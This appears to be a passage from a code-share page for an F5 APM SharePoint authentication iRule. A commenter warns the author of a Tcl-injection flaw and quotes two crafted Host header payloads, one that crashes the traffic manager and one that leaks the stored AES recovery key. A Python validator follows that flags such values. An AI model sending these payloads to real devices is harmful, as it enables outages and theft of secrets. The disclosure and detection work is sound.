APM Sharepoint authentication v2
Published May 24, 2017
Version 1.0
Hi Stanislas,
you may want to double check your lines 211, 212 and 343. They allow an attacker to perform a TCL-injection attack by sending handcrafted HOST header values.
Remote Code Execution with TMM crash:
Host: www.[while { 1 } { set x 1 }].de
Disclosure of your AES Recovery Key:
Host: www.[b64encode [subst [b64decode JHN0YXRpYzo6c2Vzc2lvbl9yZXN0b3JlX2Flc19rZXk=]]].de
Cheers, Kai
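A strict Host header validator for triaging request logs for the kind of value described in the comment above. This is an added example, not code from the original code share or from the commenter. The names parse_host, classify and SAMPLES are hypothetical, and the sample values are constructed. It goes beyond the two values shown by also handling ports and bracketed IPv6 literals, the one case where square brackets are legitimate in a Host value.

```python
import ipaddress
import re

# RFC 1123 label: letters, digits, hyphen; 1-63 chars; no leading/trailing hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
# Characters that trigger Tcl substitution, grouping or command separation.
TCL_META = set('[]${}\\;"')

def parse_host(value):
    """Return (host, port) for a well-formed Host value; raise ValueError otherwise."""
    if not value or len(value) > 255:
        raise ValueError("empty or oversized value")
    if value.startswith("["):
        # Bracketed IPv6 literal: the only place '[' and ']' may appear.
        end = value.find("]")
        inner = value[1:end] if end > 0 else ""
        # Allow only address characters; this also rejects zone ids ("%...").
        if not re.fullmatch(r"[0-9A-Fa-f:.]+", inner):
            raise ValueError("invalid IPv6 literal")
        host = "[%s]" % ipaddress.IPv6Address(inner)  # ValueError if not an address
        sep, port = value[end + 1:end + 2], value[end + 2:]
        if value[end + 1:] and sep != ":":
            raise ValueError("junk after IPv6 literal")
    else:
        host, sep, port = value.partition(":")
        if not all(LABEL.fullmatch(label) for label in host.split(".")):
            raise ValueError("invalid hostname label")
        host = host.lower()
    if sep:
        if not (port.isascii() and port.isdigit() and 0 < int(port) <= 65535):
            raise ValueError("invalid port")
        return host, int(port)
    return host, None

def classify(value):
    """Return 'ok', 'tcl-meta' (rejected, carries Tcl metacharacters) or 'malformed'."""
    try:
        parse_host(value)
        return "ok"
    except ValueError:
        return "tcl-meta" if TCL_META & set(value) else "malformed"

# Constructed sample values, not taken from real traffic.
SAMPLES = ["www.example.com", "example.com:8443", "[2001:db8::1]:443",
           "www.[cmd].example", "[cmd].example", "bad_host.example"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{classify(sample):10} {sample}")
```

Values classified as tcl-meta are the ones worth alerting on; the same allow-list applied to the Host value before it is used anywhere in an iRule means only hostname characters ever reach the Tcl interpreter.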